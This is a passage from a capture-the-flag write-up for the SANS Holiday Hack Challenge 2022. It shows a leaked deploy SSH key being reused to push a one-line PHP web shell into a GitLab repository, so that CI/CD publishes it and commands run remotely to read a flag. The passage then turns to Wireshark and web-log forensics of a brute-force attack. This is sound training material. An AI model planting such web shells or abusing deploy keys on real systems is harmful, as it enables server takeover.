&lt;span class="go"&gt;do so (now or later) by using -c with the switch command. Example:&lt;/span&gt;

&lt;span class="go"&gt;  git switch -c &amp;lt;new-branch-name&amp;gt;&lt;/span&gt;

&lt;span class="go"&gt;Or undo this operation with:&lt;/span&gt;

&lt;span class="go"&gt;  git switch -&lt;/span&gt;

&lt;span class="go"&gt;Turn off this advice by setting config variable advice.detachedHead to false&lt;/span&gt;

&lt;span class="go"&gt;HEAD is now at abdea0e added assets&lt;/span&gt;

&lt;span class="gp"&gt;grinchum-land:~/wordpress.flag.net.internal$&lt;/span&gt; cp .ssh/.deploy ~/deploy
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We'll put the correct rights on it, and create a working SSH configuration so
that the key is used for the Git repository:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;grinchum-land:~/wordpress.flag.net.internal$&lt;/span&gt; chmod &lt;span class="m"&gt;600&lt;/span&gt; ~/deploy
&lt;span class="gp"&gt;grinchum-land:~/wordpress.flag.net.internal$&lt;/span&gt; mkdir ~/.ssh
&lt;span class="gp"&gt;grinchum-land:~/wordpress.flag.net.internal$&lt;/span&gt; cat &lt;span class="s"&gt;&amp;lt;&amp;lt; EOF &amp;gt; ~/.ssh/config&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&lt;/span&gt;&lt;span class="s"&gt; Host gitlab.flag.net.internal&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&lt;/span&gt;&lt;span class="s"&gt;         User git&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&lt;/span&gt;&lt;span class="s"&gt;         IdentityFile /home/samways/deploy&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&lt;/span&gt;&lt;span class="s"&gt; EOF&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Then, we must configure the &lt;code&gt;remote&lt;/code&gt; of our Git repository to use SSH.
Indeed, since we cloned the repository through HTTP, the &lt;code&gt;remote&lt;/code&gt; is
configured with this protocol:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;grinchum-land:~/wordpress.flag.net.internal$&lt;/span&gt; git remote -v
&lt;span class="go"&gt;origin  http://gitlab.flag.net.internal/rings-of-powder/wordpress.flag.net.internal.git (fetch)&lt;/span&gt;
&lt;span class="go"&gt;origin  http://gitlab.flag.net.internal/rings-of-powder/wordpress.flag.net.internal.git (push)&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So let's modify our &lt;code&gt;remote&lt;/code&gt; so that it uses the SSH protocol:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;grinchum-land:~/wordpress.flag.net.internal$&lt;/span&gt; git remote set-url --add origin git@gitlab.flag.net.internal:rings-of-powder/wordpress.flag.net.internal.git
&lt;span class="gp"&gt;grinchum-land:~/wordpress.flag.net.internal$&lt;/span&gt; git remote set-url --delete origin  http://gitlab.flag.net.internal/rings-of-powder/wordpress.flag.net.internal.git
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's check if everything is fine:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;grinchum-land:~/wordpress.flag.net.internal$&lt;/span&gt; git remote -v
&lt;span class="go"&gt;origin  git@gitlab.flag.net.internal:rings-of-powder/wordpress.flag.net.internal.git (fetch)&lt;/span&gt;
&lt;span class="go"&gt;origin  git@gitlab.flag.net.internal:rings-of-powder/wordpress.flag.net.internal.git (push)&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Perfect! Now we just configure our local Git install with a name and an email
address:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;grinchum-land:~/wordpress.flag.net.internal$&lt;/span&gt; git config --global user.email &lt;span class="s2"&gt;&amp;quot;samways@grinchum-land.flag.net.internal&amp;quot;&lt;/span&gt;
&lt;span class="gp"&gt;grinchum-land:~/wordpress.flag.net.internal$&lt;/span&gt; git config --global user.name &lt;span class="s2"&gt;&amp;quot;samways@grinchum-land.flag.net.internal&amp;quot;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;And we're all set! Now, we can make our malicious commit. Let's
&lt;code&gt;checkout&lt;/code&gt; back to the most recent commit, and create our web shell:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;grinchum-land:~/wordpress.flag.net.internal$&lt;/span&gt; git checkout main
&lt;span class="go"&gt;Previous HEAD position was abdea0e added assets&lt;/span&gt;
&lt;span class="go"&gt;Switched to branch &amp;#39;main&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;Your branch is up to date with &amp;#39;origin/main&amp;#39;.&lt;/span&gt;
&lt;span class="gp"&gt;grinchum-land:~/wordpress.flag.net.internal$&lt;/span&gt; cat &lt;span class="s"&gt;&amp;lt;&amp;lt; EOF &amp;gt; cmd.php&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&lt;/span&gt;&lt;span class="s"&gt;     &amp;lt;?php system($_GET[&amp;#39;c&amp;#39;]); ?&amp;gt;&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&lt;/span&gt;&lt;span class="s"&gt; EOF&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;It's commit time:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;grinchum-land:~/wordpress.flag.net.internal$&lt;/span&gt; git add cmd.php
&lt;span class="gp"&gt;grinchum-land:~/wordpress.flag.net.internal$&lt;/span&gt; git commit -m &lt;span class="s2"&gt;&amp;quot;important commit&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;[main 0d54146] important commit&lt;/span&gt;
&lt;span class="go"&gt; 1 file changed, 1 insertion(+)&lt;/span&gt;
&lt;span class="go"&gt; create mode 100644 cmd.php&lt;/span&gt;
&lt;span class="gp"&gt;grinchum-land:~/wordpress.flag.net.internal$&lt;/span&gt; git push
&lt;span class="go"&gt;Enumerating objects: 4, done.&lt;/span&gt;
&lt;span class="go"&gt;Counting objects: 100% (4/4), done.&lt;/span&gt;
&lt;span class="go"&gt;Delta compression using up to 2 threads&lt;/span&gt;
&lt;span class="go"&gt;Compressing objects: 100% (2/2), done.&lt;/span&gt;
&lt;span class="go"&gt;Writing objects: 100% (3/3), 308 bytes | 308.00 KiB/s, done.&lt;/span&gt;
&lt;span class="go"&gt;Total 3 (delta 1), reused 0 (delta 0), pack-reused 0&lt;/span&gt;
&lt;span class="go"&gt;To gitlab.flag.net.internal:/rings-of-powder/wordpress.flag.net.internal.git&lt;/span&gt;
&lt;span class="go"&gt;   37b5d57..0d54146  main -&amp;gt; main&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We wait a couple of seconds for the CI/CD pipeline to publish our webshell,
aaaaand:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;grinchum-land:~$&lt;/span&gt; curl http://wordpress.flag.net.internal/cmd.php?c&lt;span class="o"&gt;=&lt;/span&gt;whoami
&lt;span class="go"&gt;www-data&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Voilà! Now we can look at the &lt;code&gt;/flag.txt&lt;/code&gt; file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;grinchum-land:~$&lt;/span&gt; curl http://wordpress.flag.net.internal/cmd.php?c&lt;span class="o"&gt;=&lt;/span&gt;cat+/flag.txt

&lt;span class="go"&gt;                           Congratulations! You&amp;#39;ve found the HHC2022 Elfen Ring!&lt;/span&gt;


&lt;span class="go"&gt;                                        ░░░░            ░░░░&lt;/span&gt;
&lt;span class="go"&gt;                                ░░                              ░░░░&lt;/span&gt;
&lt;span class="go"&gt;                            ░░                                      ░░░░&lt;/span&gt;
&lt;span class="go"&gt;                                                                        ░░&lt;/span&gt;
&lt;span class="go"&gt;                      ░░                                                  ░░░░&lt;/span&gt;
&lt;span class="go"&gt;                                                                              ░░&lt;/span&gt;
&lt;span class="go"&gt;                                      ░░░░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒░░░░                  ░░&lt;/span&gt;
&lt;span class="go"&gt;                                  ░░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▒▒░░                ░░&lt;/span&gt;
&lt;span class="go"&gt;                              ░░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▒▒                ░░&lt;/span&gt;
&lt;span class="go"&gt;                          ░░▒▒▒▒▓▓▓▓▓▓▓▓▓▓░░              ▓▓▓▓▓▓▓▓▒▒░░░░            ░░░░&lt;/span&gt;
&lt;span class="go"&gt;          ░░            ░░▒▒▓▓▓▓▓▓▓▓                            ▓▓▓▓▓▓▒▒░░            ░░░░&lt;/span&gt;
&lt;span class="go"&gt;                      ░░▒▒▓▓▓▓▓▓                                    ▓▓▒▒▒▒░░          ░░░░&lt;/span&gt;
&lt;span class="go"&gt;                      ▒▒▓▓▓▓▓▓                                        ▓▓▓▓▒▒░░          ░░░░&lt;/span&gt;
&lt;span class="go"&gt;      ░░            ▒▒▓▓▓▓▓▓                                            ▓▓▒▒░░░░        ░░░░▒▒&lt;/span&gt;
&lt;span class="go"&gt;                  ░░▒▒▓▓▓▓░░                                            ░░▒▒▒▒░░░░      ░░░░▒▒&lt;/span&gt;
&lt;span class="go"&gt;                  ░░▓▓▓▓▓▓                                                ▓▓▒▒░░░░      ░░░░▒▒&lt;/span&gt;
&lt;span class="go"&gt;    ░░            ▒▒▓▓▓▓                                                    ▒▒░░░░        ░░▒▒▒▒&lt;/span&gt;
&lt;span class="go"&gt;    ░░          ░░▓▓▓▓▓▓                                                    ▒▒▒▒░░░░      ░░▒▒▒▒&lt;/span&gt;
&lt;span class="go"&gt;    ░░          ▒▒▓▓▓▓                                                        ▒▒░░░░      ░░▒▒▒▒&lt;/span&gt;
&lt;span class="go"&gt;                ▒▒▓▓▓▓                                                        ▒▒░░░░░░    ░░▒▒▒▒&lt;/span&gt;
&lt;span class="go"&gt;  ░░          ░░▓▓▓▓▒▒                                                        ▒▒░░░░░░    ░░▒▒▒▒▓▓&lt;/span&gt;
&lt;span class="go"&gt;  ░░          ▒▒▓▓▓▓                                                            ░░░░░░░░  ░░▒▒▒▒▓▓&lt;/span&gt;
&lt;span class="go"&gt;  ░░          ▒▒▓▓▓▓                                                            ░░░░░░░░  ░░▒▒▒▒▓▓&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;  ░░          ▒▒▓▓▓▓               oI40zIuCcN8c3MhKgQjOMN8lfYtVqcKT             ░░░░░░░░  ░░▒▒▒▒▓▓&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;  ░░░░        ▒▒▓▓▓▓                                                            ░░░░  ░░░░░░▒▒▒▒▓▓&lt;/span&gt;
&lt;span class="go"&gt;  ░░░░        ▒▒▓▓▓▓                                                            ░░    ░░░░▒▒▒▒▒▒▓▓&lt;/span&gt;
&lt;span class="go"&gt;  ▒▒░░        ▒▒▓▓▓▓                                                            ░░    ░░░░▒▒▒▒▒▒▓▓&lt;/span&gt;
&lt;span class="go"&gt;  ▒▒░░░░      ▒▒▓▓▓▓                                                            ░░    ░░░░▒▒▒▒▒▒▓▓&lt;/span&gt;
&lt;span class="go"&gt;  ▓▓░░░░      ░░▓▓▓▓▒▒                                                        ░░      ░░░░▒▒▒▒▓▓▓▓&lt;/span&gt;
&lt;span class="go"&gt;    ▒▒░░        ▒▒▓▓▓▓                                                        ░░    ░░░░▒▒▒▒▒▒▓▓&lt;/span&gt;
&lt;span class="go"&gt;    ▒▒░░░░      ░░▓▓▓▓                                                        ░░    ░░░░▒▒▒▒▓▓▓▓&lt;/span&gt;
&lt;span class="go"&gt;    ▓▓▒▒░░      ░░▒▒▓▓▓▓                                                    ░░      ░░▒▒▒▒▒▒▓▓▓▓&lt;/span&gt;
&lt;span class="go"&gt;    ▓▓▒▒░░░░      ▒▒▒▒▓▓                                                          ░░░░▒▒▒▒▒▒▓▓▓▓&lt;/span&gt;
&lt;span class="go"&gt;      ▒▒▒▒░░░░    ▒▒▒▒▒▒▒▒                                                        ░░▒▒▒▒▒▒▒▒▓▓&lt;/span&gt;
&lt;span class="go"&gt;      ▓▓▒▒░░░░    ░░░░▒▒▒▒▓▓                                            ░░      ░░░░▒▒▒▒▒▒▓▓▓▓&lt;/span&gt;
&lt;span class="go"&gt;        ▒▒▒▒░░░░    ░░▒▒▒▒▒▒▒▒                                        ░░      ░░░░▒▒▒▒▒▒▒▒▓▓&lt;/span&gt;
&lt;span class="go"&gt;          ▓▓▒▒░░░░  ░░░░░░░░▒▒▓▓                                    ░░      ░░░░▒▒▒▒▒▒▓▓▓▓&lt;/span&gt;
&lt;span class="go"&gt;          ▓▓▓▓▒▒░░░░░░░░░░░░░░▒▒▒▒▓▓                            ░░        ░░░░▒▒▒▒▒▒▓▓▓▓▓▓&lt;/span&gt;
&lt;span class="go"&gt;            ▓▓▓▓▒▒░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▒                ░░░░          ░░░░▒▒▒▒▒▒▓▓▓▓▓▓&lt;/span&gt;
&lt;span class="go"&gt;              ▓▓▓▓▒▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░                ░░░░▒▒▒▒▒▒▓▓▓▓▓▓&lt;/span&gt;
&lt;span class="go"&gt;                ▓▓▒▒▒▒▒▒░░░░░░░░░░░░░░░░░░                        ░░░░▒▒▒▒▒▒▒▒▒▒▓▓▓▓&lt;/span&gt;
&lt;span class="go"&gt;                  ▓▓▓▓▓▓▒▒▒▒░░░░░░░░░░░░░░░░              ░░░░░░░░▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓&lt;/span&gt;
&lt;span class="go"&gt;                    ▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒▒░░░░░░░░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓&lt;/span&gt;
&lt;span class="go"&gt;                      ██▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓██&lt;/span&gt;
&lt;span class="go"&gt;                          ██▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██&lt;/span&gt;
&lt;span class="go"&gt;                            ████▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓████&lt;/span&gt;
&lt;span class="go"&gt;                                ████████▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████&lt;/span&gt;
&lt;span class="go"&gt;                                ░░░░░░░░▓▓██████████████████░░░░░░░░&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The answer is &lt;code&gt;oI40zIuCcN8c3MhKgQjOMN8lfYtVqcKT&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;This gives us our second ring, the Elfen Ring:&lt;/p&gt;
&lt;img alt="The Elfen Ring. It's a simple golden ring, like the one from Lord of the Rings, etched with elvish runes." class="align-center" src="/images/sans-christmas-challenge-2022/elfen_ring.png" /&gt;
&lt;img alt="Rippin Proudboot, same image as before." class="align-center" src="/images/sans-christmas-challenge-2022/rippinproudboot.png" /&gt;
&lt;p&gt;&lt;em&gt;Rippin Proudboot says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;How unexpected, you were actually able to help!&lt;/p&gt;
&lt;p&gt;Well, then I must apoligize for my dubious greeting.&lt;/p&gt;
&lt;p&gt;Us Flobbits can't help it sometimes, it's just in our nature.&lt;/p&gt;
&lt;p&gt;Right then, there are other Flobbits that need assistance further into the
burrows.&lt;/p&gt;
&lt;p&gt;Thank you, and off you go.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Right beside Ripping, we see Grinchum:&lt;/p&gt;
&lt;img alt="Grinchum is frowning a little bit more." class="align-center" src="/images/sans-christmas-challenge-2022/smeagolmad2.png" /&gt;
&lt;p&gt;&lt;em&gt;Grinchum says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;😖 &lt;em&gt;A second Precious is gone! Now we only have three.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;🤨 &lt;strong&gt;Why are you humanses nagging us? We are busy.&lt;/strong&gt; &lt;em&gt;grinchum..grinchum&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;You want to know about us? If we tell the naggy human, will it go away?
Fine...&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;🥺 &lt;strong&gt;The jolly human and the elfses locked up the Preciouses, but I freed
them all, and together we escaped.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;We fled, and we were so alone. We soon forgot the taste of Lembanh, the
softness of snowflakes falling, even our name.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;And we only wanted to eat raw fish: nigiri, maki, or shashimi. But we
most likes gnawing the whole, living fish, so juicy sweet.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Then we saw the Sporcses, and they wanted my Preciouses all to
themselves.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;And the humanses came, but they just want coinses for their silly hats.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;We only meant to protect you, Preciouses, from the naughty Elfses and
Flobbitses and Sporcses, so we locked you away.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;😏 &lt;strong&gt;Now leave us alone, naggy human, we must find the two missing
Preciouses.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="recover-the-web-ring"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id11"&gt;Recover the Web Ring&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;We go keep going down and chance upon Tangle Coalbox. We learn a little bit
more on the nature of Flobbits and Sporcs:&lt;/p&gt;
&lt;img alt="Tangle Coalbox is a blue-skinned elf with a white T-Shirt, bright green pants, red- and white-striped socks, bright green pointy elf shoes, and an orange-brownish Christmas hat." class="align-center" src="/images/sans-christmas-challenge-2022/tanglecoalbox.png" /&gt;
&lt;p&gt;&lt;em&gt;Tangle Coalbox says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Hey there, Gumshoe. Tangle Coalbox here again.&lt;/p&gt;
&lt;p&gt;Morcel told you all about the Flobbits, right? Well, be careful ahead.&lt;/p&gt;
&lt;p&gt;Once thought to be the stuff of myths, the Sporcs truly are real, and as
mean as they are in the stories.&lt;/p&gt;
&lt;p&gt;Once we gained the Flobbits' trust, they taught us all about the Sporcs.
They, too, were part of the Great Schism.&lt;/p&gt;
&lt;p&gt;They were another people who split off from the colony of Frostians in Oz,
though, they're more closely related to the trolls.&lt;/p&gt;
&lt;p&gt;The Flobbits, on the other hand, are more like the Munchkins. Like the
Flobbits, the Sporcs appear when the rings are at risk.&lt;/p&gt;
&lt;p&gt;Digging far down into the ground causes them to emerge, too. Seems we
created a perfect storm. Whoops!&lt;/p&gt;
&lt;p&gt;They're definitely up to no good, and trying to get the Rings for
themselves. Tread lightly, friend, and good luck!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="section" id="naughty-ip"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id12"&gt;Naughty IP&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;On our way to the Web Ring, we find Alabaster Snowball:&lt;/p&gt;
&lt;img alt="Alabaster Snowball is an elf with purple skin, a dark green coat with white fur, light green pants, black- and white-striped socks, and green pointy elf shoes. He has a dark green Christmas hat on his head. He's wearing big, roung glasses, and has a white beard." class="align-center" src="/images/sans-christmas-challenge-2022/alabastersnowball.png" /&gt;
&lt;p&gt;&lt;em&gt;Alabaster Snowball says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Hey there! I'm Alabaster Snowball&lt;/p&gt;
&lt;p&gt;And I have to say, I'm a bit distressed.&lt;/p&gt;
&lt;p&gt;I was working with the dwarves and their Boria mines, and I found some
disturbing activity!&lt;/p&gt;
&lt;p&gt;Looking through &lt;a class="reference external" href="/docs/sans-christmas-challenge-2022/boriaArtifacts.zip"&gt;these artifacts&lt;/a&gt;,
I think something naughty's going on.&lt;/p&gt;
&lt;p&gt;Can you please take a look and answer a few questions for me?&lt;/p&gt;
&lt;p&gt;First, we need to know where the attacker is coming from.&lt;/p&gt;
&lt;p&gt;If you haven't looked at Wireshark's Statistics menu, this might be a good
time!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Let's take a look at these artifacts:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; unzip boriaArtifacts.zip
&lt;span class="go"&gt;Archive:  boriaArtifacts.zip&lt;/span&gt;
&lt;span class="go"&gt;  inflating: victim.pcap&lt;/span&gt;
&lt;span class="go"&gt;  inflating: weberror.log&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The PCAP file seems the perfect candidate to take a look at the Wireshark's
Statistics menu. Let's open it up and go to &lt;code&gt;Statistics &amp;gt; IPv4 Statistics
&amp;gt; All Addresses&lt;/code&gt;:&lt;/p&gt;
&lt;img alt="The Wireshark's Statistics menu. There's a volumetry by IP address. The first IP address is 10.12.42.16 with a count of 36874 and a presence percentage of 100%. The second IP address is 18.222.86.32 with a count of 16603 and a presence percentage of 45,03%." class="align-center" src="/images/sans-christmas-challenge-2022/pcap_statistics.png" /&gt;
&lt;p&gt;The first IP address, &lt;code&gt;10.12.42.16&lt;/code&gt;, is present in 100% of the packets.
This is most likely the IP address of the audited system. Therefore, the most
likely candidate for the attacker's IP address is &lt;code&gt;18.222.86.32&lt;/code&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="credential-mining"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id13"&gt;Credential Mining&lt;/a&gt;&lt;/h3&gt;
&lt;img alt="Alabaster Snowball, same image as before." class="align-center" src="/images/sans-christmas-challenge-2022/alabastersnowball.png" /&gt;
&lt;p&gt;&lt;em&gt;Alabaster Snowball says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Aha, you found the naughty actor! Next, please look into the account brute
force attack.&lt;/p&gt;
&lt;p&gt;You can focus on requests to /login.html~&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;We must find the first login used in the bruteforce attack. Let's create a
Wireshark filter that will focus on:&lt;/p&gt;
&lt;ol class="arabic simple"&gt;
&lt;li&gt;The attacker's IP address&lt;/li&gt;
&lt;li&gt;THe HTTP &lt;code&gt;POST&lt;/code&gt; method&lt;/li&gt;
&lt;li&gt;The URI &lt;code&gt;/login.html&lt;/code&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;ip.addr== 18.222.86.32 &amp;amp;&amp;amp; http.request.method == &amp;quot;POST&amp;quot; &amp;amp;&amp;amp; http.request.uri == &amp;quot;/login.html&amp;quot;
&lt;/pre&gt;&lt;/div&gt;
&lt;img alt="The Wireshark's interface with the result of our filtering. We can see that the first login tried by the attacker is alice." class="align-center" src="/images/sans-christmas-challenge-2022/pcap_bruteforce_attack.png" /&gt;
&lt;p&gt;The first login tried by the attacker is &lt;code&gt;alice&lt;/code&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="ftw"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id14"&gt;404 FTW&lt;/a&gt;&lt;/h3&gt;
&lt;img alt="Alabaster Snowball, same image as before." class="align-center" src="/images/sans-christmas-challenge-2022/alabastersnowball.png" /&gt;
&lt;p&gt;&lt;em&gt;Alabaster Snowball says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Alice? I totally expected Eve! Well how about forced browsing? What's the
first URL path they found that way?&lt;/p&gt;
&lt;p&gt;The misses will have HTTP status code 404 and, in this case, the successful
guesses return 200.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Let's leave the PCAP file for now and take a look at the other artifact, the
web log. We'll &lt;code&gt;grep&lt;/code&gt; for the attacker's IP address and filter out
responses with an HTTP code &lt;code&gt;404&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; grep &lt;span class="m"&gt;18&lt;/span&gt;.222.86.32 weberror.log &lt;span class="p"&gt;|&lt;/span&gt; grep -v &lt;span class="m"&gt;404&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; tail -n &lt;span class="m"&gt;20&lt;/span&gt;
&lt;span class="go"&gt;18.222.86.32 - - [05/Oct/2022 16:46:45] &amp;quot;POST /login.html HTTP/1.1&amp;quot; 200 -&lt;/span&gt;
&lt;span class="go"&gt;18.222.86.32 - - [05/Oct/2022 16:46:45] &amp;quot;POST /login.html HTTP/1.1&amp;quot; 200 -&lt;/span&gt;
&lt;span class="go"&gt;18.222.86.32 - - [05/Oct/2022 16:46:45] &amp;quot;POST /login.html HTTP/1.1&amp;quot; 200 -&lt;/span&gt;
&lt;span class="go"&gt;18.222.86.32 - - [05/Oct/2022 16:46:45] &amp;quot;POST /login.html HTTP/1.1&amp;quot; 200 -&lt;/span&gt;
&lt;span class="go"&gt;18.222.86.32 - - [05/Oct/2022 16:46:45] &amp;quot;POST /login.html HTTP/1.1&amp;quot; 200 -&lt;/span&gt;
&lt;span class="go"&gt;18.222.86.32 - - [05/Oct/2022 16:46:45] &amp;quot;POST /login.html HTTP/1.1&amp;quot; 200 -&lt;/span&gt;
&lt;span class="go"&gt;18.222.86.32 - - [05/Oct/2022 16:46:45] &amp;quot;POST /login.html HTTP/1.1&amp;quot; 200 -&lt;/span&gt;
&lt;span class="go"&gt;18.222.86.32 - - [05/Oct/2022 16:46:45] &amp;quot;POST /login.html HTTP/1.1&amp;quot; 200 -&lt;/span&gt;
&lt;span class="go"&gt;18.222.86.32 - - [05/Oct/2022 16:46:45] &amp;quot;POST /login.html HTTP/1.1&amp;quot; 200 -&lt;/span&gt;
&lt;span class="go"&gt;18.222.86.32 - - [05/Oct/2022 16:47:15] &amp;quot;POST /login.html HTTP/1.1&amp;quot; 302 -&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;18.222.86.32 - - [05/Oct/2022 16:47:46] &amp;quot;GET /proc HTTP/1.1&amp;quot; 200 -&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;18.222.86.32 - - [05/Oct/2022 16:47:47] &amp;quot;GET /maintenance.html HTTP/1.1&amp;quot; 200 -&lt;/span&gt;
&lt;span class="go"&gt;18.222.86.32 - - [05/Oct/2022 16:48:17] &amp;quot;GET /proc HTTP/1.1&amp;quot; 200 -&lt;/span&gt;
&lt;span class="go"&gt;18.222.86.32 - - [05/Oct/2022 16:48:27] &amp;quot;POST /proc HTTP/1.1&amp;quot; 200 -&lt;/span&gt;
&lt;span class="go"&gt;18.222.86.32 - - [05/Oct/2022 16:48:32] &amp;quot;POST /proc HTTP/1.1&amp;quot; 200 -&lt;/span&gt;
&lt;span class="go"&gt;18.222.86.32 - - [05/Oct/2022 16:48:37] &amp;quot;POST /proc HTTP/1.1&amp;quot; 200 -&lt;/span&gt;
&lt;span class="go"&gt;18.222.86.32 - - [05/Oct/2022 16:48:42] &amp;quot;POST /proc HTTP/1.1&amp;quot; 200 -&lt;/span&gt;
&lt;span class="go"&gt;18.222.86.32 - - [05/Oct/2022 16:48:47] &amp;quot;POST /proc HTTP/1.1&amp;quot; 200 -&lt;/span&gt;
&lt;span class="go"&gt;18.222.86.32 - - [05/Oct/2022 16:48:52] &amp;quot;POST /proc HTTP/1.1&amp;quot; 200 -&lt;/span&gt;
&lt;span class="go"&gt;18.222.86.32 - - [05/Oct/2022 16:48:57] &amp;quot;POST /proc HTTP/1.1&amp;quot; 200 -&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;After the bruteforce attack, we can see that the first URL path found by the
attacker is &lt;code&gt;/proc&lt;/code&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="imds-xxe-and-other-abbreviations"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id15"&gt;IMDS, XXE, and Other Abbreviations&lt;/a&gt;&lt;/h3&gt;
&lt;img alt="Alabaster Snowball, same image as before." class="align-center" src="/images/sans-christmas-challenge-2022/alabastersnowball.png" /&gt;
&lt;p&gt;&lt;em&gt;Alabaster Snowball says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
